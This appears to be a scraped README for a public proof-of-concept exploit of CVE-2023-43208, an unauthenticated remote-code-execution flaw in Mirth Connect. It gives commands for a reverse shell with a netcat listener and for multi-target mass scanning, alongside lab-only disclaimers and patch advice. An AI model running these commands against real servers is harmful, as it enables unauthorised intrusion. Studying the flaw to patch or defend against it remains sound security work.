## https://sploitus.com/exploit?id=2C04A966-2C17-590B-B95C-9521B8AD1CDE
# CVE-2023-43208-EXPLOIT
## Mirth Connect Remote Code Execution (RCE) Exploit




> โ ๏ธ **FOR EDUCATIONAL AND LAB USE ONLY** โ ๏ธ
A proof-of-concept exploit for CVE-2023-43208, a remote code execution vulnerability in Mirth Connect before version 4.4.1.
## ๐จ IMPORTANT LEGAL DISCLAIMER
**This tool is strictly for:**
- ๐งช **Educational purposes**
- ๐ฌ **Authorized security testing in lab environments**
- ๐ **Cybersecurity research and learning**
**DO NOT USE:**
- โ Against systems you don't own
- โ Without explicit written permission
- โ In production environments
- โ For illegal or malicious purposes
**You are responsible for complying with all applicable laws and regulations. Misuse of this tool may result in criminal charges.**
## ๐ Description
This exploit targets the XML deserialization vulnerability in Mirth Connect's `/api/users` endpoint, allowing unauthenticated remote code execution on affected versions (< 4.4.1).
**This is a CRITICAL vulnerability and should ONLY be tested in isolated lab environments with your own systems.**
## ๐ง Requirements
- Python 3.7 or higher
- Required packages listed in `requirements.txt`
- **A LAB ENVIRONMENT** with vulnerable Mirth Connect instance
## ๐ Installation
# Clone the repository
git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git
cd CVE-2023-43208-EXPLOIT
# Install requirements
pip install -r requirements.txt
๐ป Usage (LAB USE ONLY)
Interactive Mode (Recommended for Lab)
bash
python exploit.py
Command Line Mode
bash
# Single target exploitation (LAB USE ONLY)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444
# Scan multiple targets from file (LAB USE ONLY)
python exploit.py -f targets.txt -t 50 -o vulnerable.txt
# Non-interactive mode (LAB USE ONLY)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive
Options
text
-u, --url Target URL to exploit (LAB USE ONLY)
-lh, --lhost Listening host (your IP)
-lp, --lport Listening port
-f, --file File containing target URLs to scan
-o, --output Output file for saving scan results
-t, --threads Number of threads for scanning (default: 50)
--no-interactive Run in non-interactive mode
๐ฏ Lab Environment Example
Set up your lab:
Install vulnerable Mirth Connect version (< 4.4.1) in isolated VM
Use controlled network (e.g., NAT/Host-only in VirtualBox/VMware)
Never expose to internet
Start your listener:
ncat -lnvp 4444
# or
nc -lnvp 4444
Run the exploit in your lab:
python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444
๐งช Test Environment Requirements
Isolated network/VLAN
Virtual machines only
No production data
Firewall rules blocking external access
Proper authorization documented
๐ Technical Details
Vulnerability Type: XML Deserialization RCE
Affected Versions: Mirth Connect < 4.4.1
Fixed Version: 4.4.1 and above
CVSS Score: 9.8 (Critical)
Attack Vector: Network
Authentication: None required
The exploit uses Commons Collections gadgets to achieve RCE through the /api/users endpoint.
๐ก๏ธ Protection Measures
If you're running Mirth Connect:
โ Update to version 4.4.1 or later
โ Restrict network access to admin interfaces
โ Implement proper authentication
โ Monitor for suspicious XML payloads
๐ฅ Credits
Original Authors: K3ysTr0K3R & Chocapikk
Modified by: M0h4
CVE: CVE-2023-43208
โ ๏ธ FINAL WARNING
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ THIS TOOL IS FOR LAB USE ONLY โ
โ Unauthorized use is ILLEGAL and UNETHICAL โ
โ You assume ALL risk and liability โ
โ The author accepts NO responsibility for misuse โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ